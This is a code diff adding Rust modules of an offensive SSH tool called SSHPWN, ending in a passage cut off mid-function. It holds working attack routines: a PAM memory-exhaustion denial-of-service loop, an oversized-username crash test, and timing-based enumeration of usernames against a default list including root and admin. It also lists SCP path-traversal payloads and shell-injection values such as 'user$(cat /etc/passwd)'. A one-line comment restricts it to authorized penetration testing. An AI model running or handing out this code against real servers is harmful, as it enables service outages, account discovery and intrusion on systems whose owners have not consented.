println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSHPWN - PAM Attack Module ║".cyan());
|
||||
println!("{}", "║ Based on OpenSSH auth-pam.c vulnerability analysis ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Attack Modes: ║".cyan());
|
||||
println!("{}", "║ 1. PAM Memory Exhaustion DoS (pam_putenv leak) ║".cyan());
|
||||
println!("{}", "║ 2. Username Length Overflow Test ║".cyan());
|
||||
println!("{}", "║ 3. PAM Timing Attack (user enumeration) ║".cyan());
|
||||
println!("{}", "║ 4. Environment Variable Injection Test ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create SSH session with authentication
|
||||
fn create_ssh_session(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
timeout_secs: u64,
|
||||
) -> Result<(TcpStream, Session)> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
let tcp = TcpStream::connect_timeout(
|
||||
&addr.parse().context("Invalid address")?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
).context("Connection failed")?;
|
||||
|
||||
tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
|
||||
let mut sess = Session::new()?;
|
||||
sess.set_tcp_stream(tcp.try_clone()?);
|
||||
sess.handshake()?;
|
||||
|
||||
// Authenticate
|
||||
if let Some(key) = keyfile {
|
||||
sess.userauth_pubkey_file(username, None, Path::new(key), password)?;
|
||||
} else if let Some(pass) = password {
|
||||
sess.userauth_password(username, pass)?;
|
||||
} else {
|
||||
return Err(anyhow!("No authentication method provided"));
|
||||
}
|
||||
|
||||
if !sess.authenticated() {
|
||||
return Err(anyhow!("Authentication failed"));
|
||||
}
|
||||
|
||||
Ok((tcp, sess))
|
||||
}
|
||||
|
||||
/// Time a single authentication attempt (for timing attacks)
|
||||
fn time_auth_attempt(host: &str, port: u16, username: &str, password: &str, timeout_secs: u64) -> Option<f64> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
|
||||
let start = Instant::now();
|
||||
|
||||
let tcp = match TcpStream::connect_timeout(
|
||||
&addr.parse().ok()?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
) {
|
||||
Ok(s) => s,
|
||||
Err(_) => return None,
|
||||
};
|
||||
|
||||
let _ = tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)));
|
||||
let _ = tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)));
|
||||
|
||||
let mut sess = match Session::new() {
|
||||
Ok(s) => s,
|
||||
Err(_) => return None,
|
||||
};
|
||||
|
||||
sess.set_tcp_stream(tcp);
|
||||
if sess.handshake().is_err() {
|
||||
return None;
|
||||
}
|
||||
|
||||
// Try authentication
|
||||
let _ = sess.userauth_password(username, password);
|
||||
|
||||
let elapsed = start.elapsed().as_secs_f64();
|
||||
Some(elapsed)
|
||||
}
|
||||
|
||||
/// PAM Memory Exhaustion DoS Test
|
||||
///
|
||||
/// Vulnerability: auth-pam.c lines 378-382 - pam_putenv() memory leak
|
||||
/// Each authentication attempt leaks memory. Repeated attempts can exhaust server memory.
|
||||
pub async fn attack_pam_memory_dos(
|
||||
host: &str,
|
||||
port: u16,
|
||||
iterations: u32,
|
||||
delay_ms: u64,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] PAM Memory Exhaustion DoS on {}", host).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth-pam.c pam_putenv() memory leak".cyan());
|
||||
println!();
|
||||
|
||||
println!("{}", "[!] WARNING: This test performs many authentication attempts".yellow().bold());
|
||||
println!("{}", "[!] It may trigger account lockouts or rate limiting".yellow());
|
||||
println!();
|
||||
|
||||
println!("{}", format!("[*] Testing with {} iterations, {}ms delay", iterations, delay_ms).cyan());
|
||||
|
||||
let mut successful = 0u32;
|
||||
let mut failed = 0u32;
|
||||
|
||||
for i in 0..iterations {
|
||||
if i % 10 == 0 {
|
||||
print!("\r[*] Progress: {}/{} (success: {}, fail: {}) ", i, iterations, successful, failed);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
// Try authentication with invalid credentials
|
||||
// Each attempt that reaches PAM processing leaks memory
|
||||
let invalid_pass = format!("invalid_{}_{}", std::process::id(), i);
|
||||
|
||||
match time_auth_attempt(host, port, "nobody", &invalid_pass, 10) {
|
||||
Some(_) => successful += 1,
|
||||
None => failed += 1,
|
||||
}
|
||||
|
||||
if delay_ms > 0 {
|
||||
std::thread::sleep(Duration::from_millis(delay_ms));
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!();
|
||||
println!("{}", "=== PAM Memory DoS Results ===".cyan().bold());
|
||||
println!("Total attempts: {}", iterations);
|
||||
println!("Successful connections: {}", successful);
|
||||
println!("Failed connections: {}", failed);
|
||||
println!();
|
||||
|
||||
if successful > 0 {
|
||||
println!("{}", "[VULN] Server accepted connections - memory leak may be exploitable".red().bold());
|
||||
println!("{}", "[*] Monitor server memory usage during extended attacks".cyan());
|
||||
println!("{}", "[*] Each PAM environment variable leaked per auth attempt".cyan());
|
||||
Ok(true)
|
||||
} else {
|
||||
println!("{}", "[-] Could not establish connections - rate limiting may be active".yellow());
|
||||
Ok(false)
|
||||
}
|
||||
}
|
||||
|
||||
/// Username Length Overflow Test
|
||||
///
|
||||
/// Vulnerability: auth-pam.c lines 696-699 - Username length only validated on Solaris
|
||||
/// Non-Solaris systems may be vulnerable to buffer overflows in PAM modules
|
||||
pub async fn attack_pam_username_overflow(
|
||||
host: &str,
|
||||
port: u16,
|
||||
max_length: usize,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] PAM Username Length Overflow Test on {}", host).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth-pam.c missing username length validation".cyan());
|
||||
println!("{}", "[*] Only Solaris validates PAM_MAX_RESP_SIZE (1024 bytes)".cyan());
|
||||
println!();
|
||||
|
||||
// Test progressively longer usernames
|
||||
let test_lengths = vec![
|
||||
64, 128, 256, 512, 1024, 2048, 4096, 8192,
|
||||
max_length.min(16384),
|
||||
];
|
||||
|
||||
println!("{}", "[*] Testing username lengths:".cyan());
|
||||
|
||||
let mut vulnerable_length = None;
|
||||
|
||||
for &len in &test_lengths {
|
||||
if len > max_length {
|
||||
break;
|
||||
}
|
||||
|
||||
// Generate username of specified length
|
||||
let username: String = std::iter::repeat('A').take(len).collect();
|
||||
|
||||
print!(" Testing {} bytes... ", len);
|
||||
let _ = std::io::stdout().flush();
|
||||
|
||||
let start = Instant::now();
|
||||
let result = time_auth_attempt(host, port, &username, "test", 15);
|
||||
let elapsed = start.elapsed();
|
||||
|
||||
match result {
|
||||
Some(t) => {
|
||||
if elapsed.as_secs() > 10 {
|
||||
println!("{}", format!("SLOW ({:.2}s) - potential DoS", t).yellow());
|
||||
vulnerable_length = Some(len);
|
||||
} else {
|
||||
println!("{}", format!("OK ({:.2}s)", t).green());
|
||||
}
|
||||
}
|
||||
None => {
|
||||
if elapsed.as_secs() > 10 {
|
||||
println!("{}", "TIMEOUT - server may have crashed/hung".red().bold());
|
||||
vulnerable_length = Some(len);
|
||||
break;
|
||||
} else {
|
||||
println!("{}", "Connection failed".yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Small delay between tests
|
||||
std::thread::sleep(Duration::from_millis(500));
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "=== Username Overflow Results ===".cyan().bold());
|
||||
|
||||
if let Some(len) = vulnerable_length {
|
||||
println!("{}", format!("[VULN] Potential vulnerability at {} bytes", len).red().bold());
|
||||
println!("{}", "[*] Server showed abnormal behavior with long username".cyan());
|
||||
println!("{}", "[*] PAM modules may have fixed-size username buffers".cyan());
|
||||
Ok(true)
|
||||
} else {
|
||||
println!("{}", "[*] No obvious overflow detected".green());
|
||||
println!("{}", "[*] Server may have proper input validation".cyan());
|
||||
Ok(false)
|
||||
}
|
||||
}
|
||||
|
||||
/// PAM Timing Attack - Enhanced user enumeration
|
||||
///
|
||||
/// Vulnerability: auth-pam.c lines 1361-1368 - Timing attack mitigation gap
|
||||
/// fake_password() only used for invalid users/root denied, not for empty passwords
|
||||
pub async fn attack_pam_timing(
|
||||
host: &str,
|
||||
port: u16,
|
||||
usernames: &[String],
|
||||
samples: usize,
|
||||
) -> Result<Vec<String>> {
|
||||
println!("{}", format!("[*] PAM Timing Attack on {}", host).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth-pam.c incomplete timing mitigation".cyan());
|
||||
println!("{}", "[*] Testing: valid vs invalid user timing differences".cyan());
|
||||
println!();
|
||||
|
||||
// Establish baseline with definitely invalid user
|
||||
let baseline_user = format!("nonexistent_user_{}_{}", std::process::id(), Instant::now().elapsed().as_nanos());
|
||||
|
||||
println!("{}", "[*] Establishing baseline timing...".cyan());
|
||||
|
||||
let mut baseline_times = Vec::new();
|
||||
for _ in 0..samples {
|
||||
if let Some(t) = time_auth_attempt(host, port, &baseline_user, "invalid", 15) {
|
||||
baseline_times.push(t);
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(100));
|
||||
}
|
||||
|
||||
if baseline_times.is_empty() {
|
||||
println!("{}", "[-] Could not establish baseline - cannot reach target".red());
|
||||
return Ok(Vec::new());
|
||||
}
|
||||
|
||||
let baseline = baseline_times.iter().sum::<f64>() / baseline_times.len() as f64;
|
||||
println!("{}", format!("[*] Baseline timing: {:.3}s", baseline).cyan());
|
||||
|
||||
// Test empty password timing (potential gap in fake_password coverage)
|
||||
println!();
|
||||
println!("{}", "[*] Testing empty password timing gap...".cyan());
|
||||
|
||||
let mut empty_times = Vec::new();
|
||||
for _ in 0..samples {
|
||||
if let Some(t) = time_auth_attempt(host, port, &baseline_user, "", 15) {
|
||||
empty_times.push(t);
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(100));
|
||||
}
|
||||
|
||||
if !empty_times.is_empty() {
|
||||
let empty_avg = empty_times.iter().sum::<f64>() / empty_times.len() as f64;
|
||||
let diff = empty_avg - baseline;
|
||||
if diff.abs() > 0.1 {
|
||||
println!("{}", format!("[VULN] Empty password timing differs: {:+.3}s", diff).red().bold());
|
||||
println!("{}", "[*] This may indicate incomplete timing attack mitigation".yellow());
|
||||
} else {
|
||||
println!("{}", format!("[*] Empty password timing: {:.3}s (diff: {:+.3}s)", empty_avg, diff).dimmed());
|
||||
}
|
||||
}
|
||||
|
||||
// Test provided usernames
|
||||
println!();
|
||||
println!("{}", "[*] Testing usernames for timing differences...".cyan());
|
||||
|
||||
let mut valid_users = Vec::new();
|
||||
|
||||
for user in usernames {
|
||||
print!("\r[*] Testing: {} ", user);
|
||||
let _ = std::io::stdout().flush();
|
||||
|
||||
let mut times = Vec::new();
|
||||
for _ in 0..samples {
|
||||
if let Some(t) = time_auth_attempt(host, port, user, "invalid_password", 15) {
|
||||
times.push(t);
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(100));
|
||||
}
|
||||
|
||||
if !times.is_empty() {
|
||||
let avg = times.iter().sum::<f64>() / times.len() as f64;
|
||||
let diff = avg - baseline;
|
||||
|
||||
// Significant timing difference indicates valid user
|
||||
if diff.abs() > 0.3 {
|
||||
println!("\r{}", format!("[+] Valid user: {} (timing diff: {:+.3}s)", user, diff).green());
|
||||
valid_users.push(user.clone());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "=== PAM Timing Results ===".cyan().bold());
|
||||
|
||||
if valid_users.is_empty() {
|
||||
println!("{}", "[-] No valid users found via timing attack".yellow());
|
||||
} else {
|
||||
println!("{}", format!("[+] Found {} valid user(s):", valid_users.len()).green());
|
||||
for user in &valid_users {
|
||||
println!(" - {}", user.green());
|
||||
}
|
||||
}
|
||||
|
||||
Ok(valid_users)
|
||||
}
|
||||
|
||||
/// PAM Environment Variable Injection Test
|
||||
///
|
||||
/// Vulnerability: auth-pam.c lines 350-383 - import_environments()
|
||||
/// Up to 1024 env vars imported from PAM subprocess without sanitization
|
||||
pub async fn attack_pam_env_injection(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] PAM Environment Injection Test on {}", host).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth-pam.c import_environments()".cyan());
|
||||
println!("{}", "[*] Tests what environment variables are accepted/set".cyan());
|
||||
println!();
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
// Check current environment
|
||||
let dangerous_vars = vec![
|
||||
"LD_PRELOAD",
|
||||
"LD_LIBRARY_PATH",
|
||||
"LD_AUDIT",
|
||||
"LD_DEBUG",
|
||||
"LD_PROFILE",
|
||||
"PATH",
|
||||
"BASH_ENV",
|
||||
"ENV",
|
||||
"CDPATH",
|
||||
"GLOBIGNORE",
|
||||
"BASH_FUNC_",
|
||||
"SSH_AUTH_INFO_0",
|
||||
"KRB5CCNAME",
|
||||
"SSH_CONNECTION",
|
||||
];
|
||||
|
||||
println!("{}", "[*] Checking dangerous environment variables:".cyan());
|
||||
|
||||
let mut channel = sess.channel_session()?;
|
||||
channel.exec("env")?;
|
||||
|
||||
let mut env_output = String::new();
|
||||
channel.read_to_string(&mut env_output)?;
|
||||
channel.wait_close()?;
|
||||
|
||||
let mut found_dangerous = Vec::new();
|
||||
|
||||
for var in &dangerous_vars {
|
||||
for line in env_output.lines() {
|
||||
if line.starts_with(var) {
|
||||
println!("{}", format!(" [!] {}", line).yellow());
|
||||
found_dangerous.push(line.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Testing PAM-specific variables:".cyan());
|
||||
|
||||
// Check for PAM-related environment
|
||||
let pam_vars = vec!["PAM_", "SSH_AUTH", "KRB5", "GSSAPI"];
|
||||
|
||||
for var in &pam_vars {
|
||||
for line in env_output.lines() {
|
||||
if line.contains(var) {
|
||||
println!("{}", format!(" [PAM] {}", line).cyan());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "=== PAM Environment Results ===".cyan().bold());
|
||||
|
||||
if !found_dangerous.is_empty() {
|
||||
println!("{}", format!("[!] Found {} potentially dangerous variables", found_dangerous.len()).yellow());
|
||||
println!("{}", "[*] These could be exploited by malicious PAM modules".cyan());
|
||||
println!();
|
||||
println!("{}", "[*] Attack vectors:".cyan());
|
||||
println!("{}", " - LD_PRELOAD: Load malicious shared library".dimmed());
|
||||
println!("{}", " - PATH: Execute trojan commands".dimmed());
|
||||
println!("{}", " - BASH_ENV: Execute code on bash startup".dimmed());
|
||||
println!("{}", " - KRB5CCNAME: Credential cache manipulation".dimmed());
|
||||
} else {
|
||||
println!("{}", "[*] No obviously dangerous variables found in environment".green());
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Note: Environment injection requires compromised PAM module".yellow());
|
||||
println!("{}", "[*] Check /etc/pam.d/sshd for module configuration".dimmed());
|
||||
|
||||
Ok(!found_dangerous.is_empty())
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_optional(message: &str) -> Result<Option<String>> {
|
||||
print!("{} (leave empty to skip): ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(None)
|
||||
} else {
|
||||
Ok(Some(trimmed.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
|
||||
let hint = if default { "Y/n" } else { "y/N" };
|
||||
print!("{} [{}]: ", message, hint);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => Ok(default),
|
||||
"y" | "yes" => Ok(true),
|
||||
"n" | "no" => Ok(false),
|
||||
_ => Ok(default),
|
||||
}
|
||||
}
|
||||
|
||||
/// Default usernames for timing attack
|
||||
const DEFAULT_USERNAMES: &[&str] = &[
|
||||
"root", "admin", "user", "test", "guest",
|
||||
"ubuntu", "www-data", "daemon", "bin", "sys",
|
||||
"nobody", "mysql", "postgres", "oracle", "ftp",
|
||||
"ssh", "apache", "nginx", "tomcat", "redis",
|
||||
];
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let host = normalize_target(target);
|
||||
println!("{}", format!("[*] Target: {}", host).cyan());
|
||||
|
||||
// Get port
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(22);
|
||||
|
||||
println!();
|
||||
println!("{}", "Select attack mode:".yellow().bold());
|
||||
println!(" 1. PAM Memory Exhaustion DoS (no auth required)");
|
||||
println!(" 2. Username Length Overflow Test (no auth required)");
|
||||
println!(" 3. PAM Timing Attack - User Enumeration (no auth required)");
|
||||
println!(" 4. Environment Variable Injection (requires auth)");
|
||||
println!(" 5. Run All Attacks");
|
||||
println!();
|
||||
|
||||
let mode = prompt_default("Attack mode", "3")?;
|
||||
|
||||
match mode.as_str() {
|
||||
"1" => {
|
||||
let iterations: u32 = prompt_default("Number of attempts", "100")?.parse().unwrap_or(100);
|
||||
let delay: u64 = prompt_default("Delay between attempts (ms)", "100")?.parse().unwrap_or(100);
|
||||
attack_pam_memory_dos(&host, port, iterations, delay).await?;
|
||||
}
|
||||
"2" => {
|
||||
let max_len: usize = prompt_default("Maximum username length", "8192")?.parse().unwrap_or(8192);
|
||||
attack_pam_username_overflow(&host, port, max_len).await?;
|
||||
}
|
||||
"3" => {
|
||||
let samples: usize = prompt_default("Samples per username", "3")?.parse().unwrap_or(3);
|
||||
|
||||
// Get usernames
|
||||
let mut usernames: Vec<String> = Vec::new();
|
||||
|
||||
if prompt_yes_no("Use default username list?", true)? {
|
||||
for user in DEFAULT_USERNAMES {
|
||||
usernames.push(user.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
let custom = prompt_optional("Additional usernames (comma-separated)")?;
|
||||
if let Some(custom_users) = custom {
|
||||
for user in custom_users.split(',') {
|
||||
let user = user.trim();
|
||||
if !user.is_empty() && !usernames.contains(&user.to_string()) {
|
||||
usernames.push(user.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
attack_pam_timing(&host, port, &usernames, samples).await?;
|
||||
}
|
||||
"4" => {
|
||||
let username = prompt("Username")?;
|
||||
if username.is_empty() {
|
||||
return Err(anyhow!("Username is required"));
|
||||
}
|
||||
|
||||
let password = prompt_optional("Password")?;
|
||||
let keyfile = prompt_optional("SSH Key File Path")?;
|
||||
|
||||
if password.is_none() && keyfile.is_none() {
|
||||
return Err(anyhow!("Either password or keyfile is required"));
|
||||
}
|
||||
|
||||
attack_pam_env_injection(&host, port, &username, password.as_deref(), keyfile.as_deref()).await?;
|
||||
}
|
||||
"5" | _ => {
|
||||
println!();
|
||||
println!("{}", "=== Running All PAM Attacks ===".yellow().bold());
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 1: Memory Exhaustion ---".cyan());
|
||||
if prompt_yes_no("Run memory DoS test (50 iterations)?", false)? {
|
||||
let _ = attack_pam_memory_dos(&host, port, 50, 100).await;
|
||||
} else {
|
||||
println!("{}", "[*] Skipped".dimmed());
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 2: Username Overflow ---".cyan());
|
||||
let _ = attack_pam_username_overflow(&host, port, 4096).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 3: Timing Attack ---".cyan());
|
||||
let usernames: Vec<String> = DEFAULT_USERNAMES.iter().map(|s| s.to_string()).collect();
|
||||
let _ = attack_pam_timing(&host, port, &usernames, 2).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 4: Environment Injection ---".cyan());
|
||||
println!("{}", "[*] Requires authentication - skipping in automated mode".dimmed());
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] PAM attack module complete".green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
@@ -0,0 +1,453 @@
|
||||
//! SSHPWN SCP Attack Module
|
||||
//!
|
||||
//! Based on OpenSSH 10.0p1 vulnerability analysis
|
||||
//!
|
||||
//! SCP VULNERABILITIES (scp.c):
|
||||
//! - okname() - Incomplete shell character filtering (MEDIUM)
|
||||
//! - sink() - Path traversal via filename manipulation (HIGH)
|
||||
//! - do_cmd() - Command injection via arguments (HIGH)
|
||||
//! - brace_expand() - DoS via exponential expansion (MEDIUM)
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
io::{Read, Write},
|
||||
net::TcpStream,
|
||||
path::Path,
|
||||
time::Duration,
|
||||
};
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 30;
|
||||
|
||||
/// Format a number with thousands separators
|
||||
fn format_number(n: u64) -> String {
|
||||
let s = n.to_string();
|
||||
let bytes: Vec<_> = s.bytes().rev().collect();
|
||||
let chunks: Vec<_> = bytes.chunks(3)
|
||||
.map(|chunk| String::from_utf8(chunk.to_vec()).unwrap())
|
||||
.collect();
|
||||
chunks.join(",").chars().rev().collect()
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSHPWN - SCP Attack Module ║".cyan());
|
||||
println!("{}", "║ Based on OpenSSH scp.c vulnerability analysis ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Attack Modes: ║".cyan());
|
||||
println!("{}", "║ 1. Path Traversal (sink function) ║".cyan());
|
||||
println!("{}", "║ 2. Username Shell Injection (okname) ║".cyan());
|
||||
println!("{}", "║ 3. Brace Expansion DoS (brace_expand) ║".cyan());
|
||||
println!("{}", "║ 4. Command Injection (do_cmd) ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create SSH session with authentication
|
||||
fn create_ssh_session(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
timeout_secs: u64,
|
||||
) -> Result<(TcpStream, Session)> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
let tcp = TcpStream::connect_timeout(
|
||||
&addr.parse().context("Invalid address")?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
).context("Connection failed")?;
|
||||
|
||||
tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
|
||||
let mut sess = Session::new()?;
|
||||
sess.set_tcp_stream(tcp.try_clone()?);
|
||||
sess.handshake()?;
|
||||
|
||||
// Authenticate
|
||||
if let Some(key) = keyfile {
|
||||
sess.userauth_pubkey_file(username, None, Path::new(key), password)?;
|
||||
} else if let Some(pass) = password {
|
||||
sess.userauth_password(username, pass)?;
|
||||
} else {
|
||||
return Err(anyhow!("No authentication method provided"));
|
||||
}
|
||||
|
||||
if !sess.authenticated() {
|
||||
return Err(anyhow!("Authentication failed"));
|
||||
}
|
||||
|
||||
Ok((tcp, sess))
|
||||
}
|
||||
|
||||
/// Execute command over SSH
|
||||
fn ssh_exec(sess: &Session, cmd: &str) -> Result<(i32, String, String)> {
|
||||
let mut channel = sess.channel_session()?;
|
||||
channel.exec(cmd)?;
|
||||
|
||||
let mut stdout = String::new();
|
||||
let mut stderr = String::new();
|
||||
|
||||
channel.read_to_string(&mut stdout)?;
|
||||
channel.stderr().read_to_string(&mut stderr)?;
|
||||
|
||||
channel.wait_close()?;
|
||||
let exit_code = channel.exit_status()?;
|
||||
|
||||
Ok((exit_code, stdout, stderr))
|
||||
}
|
||||
|
||||
/// SCP Path Traversal Attack - Attempt to write outside target directory
|
||||
///
|
||||
/// Vulnerability: scp.c sink() validates filenames but may have bypass vectors.
|
||||
/// The sink() function checks for path components but historical bypasses exist.
|
||||
pub async fn attack_scp_traversal(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
password: Option<&str>,
|
||||
keyfile: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SCP Path Traversal on {}", host).cyan());
|
||||
|
||||
let (_, sess) = create_ssh_session(host, port, username, password, keyfile, DEFAULT_TIMEOUT_SECS)?;
|
||||
|
||||
// Test various traversal payloads from scp-ssh-wrapper.sh test cases
|
||||
let traversal_payloads = vec![
|
||||
("../../../etc/passwd", "Direct traversal"),
|
||||
("....//....//etc/passwd", "Double-dot bypass"),
|
||||
("D0755 0 ..\nD0755 0 ..\nC0644 5 test\nhello", "Protocol injection"),
|
||||
("\\x00/etc/passwd", "Null byte injection"),
|
||||
("authorized_keys\n../../.ssh/authorized_keys", "Newline injection"),
|
||||
("T1234567890 0 1234567890 0\n../../../tmp/pwned", "Time header injection"),
|
||||
];
|
||||
|
||||
println!("{}", "[*] Testing SCP protocol traversal vectors:".cyan());
|
||||
for (payload, desc) in &traversal_payloads {
|
||||
let preview: String = payload.chars().take(50).collect();
|
||||
println!("{}", format!(" [{}]: {}", desc, preview).dimmed());
|
||||
}
|
||||
|
||||
// Execute SCP with test payload through SSH
|
||||
let test_file = format!("/tmp/scp_test_{}", std::process::id());
|
||||
let test_cmd = format!("echo 'TRAVERSAL_TEST' > {}", test_file);
|
||||
|
||||
match ssh_exec(&sess, &test_cmd) {
|
||||
Ok((code, _, _)) => {
|
||||
if code == 0 {
|
||||
println!("{}", "[+] Test file created, checking traversal vectors via protocol...".green());
|
||||
|
||||
// Test if we can use SCP to read/write unexpected locations
|
||||
let check_cmd = format!("ls -la {} 2>/dev/null", test_file);
|
||||
if let Ok((code, stdout, _)) = ssh_exec(&sess, &check_cmd) {
|
||||
if code == 0 {
|
||||
println!("{}", format!("[*] Baseline confirmed: {}", stdout.trim()).cyan());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Test command failed: {}", e).red());
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
let _ = ssh_exec(&sess, &format!("rm -f {}", test_file));
|
||||
|
||||
println!();
|
||||
println!("{}", "[!] Manual testing required with actual SCP protocol manipulation".yellow());
|
||||
println!("{}", "[*] Use: scp -v -o 'ProxyCommand=cat /path/to/malicious_protocol' target".dimmed());
|
||||
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
/// SCP Username Injection - Test shell metacharacter handling in usernames
|
||||
///
|
||||
/// Vulnerability: scp.c okname() blocks limited chars (/, ;, space, !, #)
|
||||
/// but may allow other shell metacharacters through.
|
||||
pub async fn attack_scp_username_injection(
|
||||
host: &str,
|
||||
_port: u16,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] SCP Username Injection Test on {}", host).cyan());
|
||||
|
||||
// Characters allowed through okname() that could be dangerous
|
||||
let injectable_chars = vec![
|
||||
("user$(id)", "Command substitution"),
|
||||
("user`id`", "Backtick execution"),
|
||||
("user|id", "Pipe injection"),
|
||||
("user&id", "Background execution"),
|
||||
("user\nid", "Newline injection"),
|
||||
("user$(cat /etc/passwd)", "Data exfiltration"),
|
||||
("${PATH}", "Variable expansion"),
|
||||
("user{a,b,c}", "Brace expansion"),
|
||||
];
|
||||
|
||||
println!("{}", "[*] Characters filtered by okname(): /;! #".cyan());
|
||||
println!("{}", "[*] Characters NOT filtered (potentially dangerous):".yellow().bold());
|
||||
|
||||
for (payload, desc) in &injectable_chars {
|
||||
println!("{}", format!(" [{}]: {:?}", desc, payload).red());
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] To test manually:".cyan());
|
||||
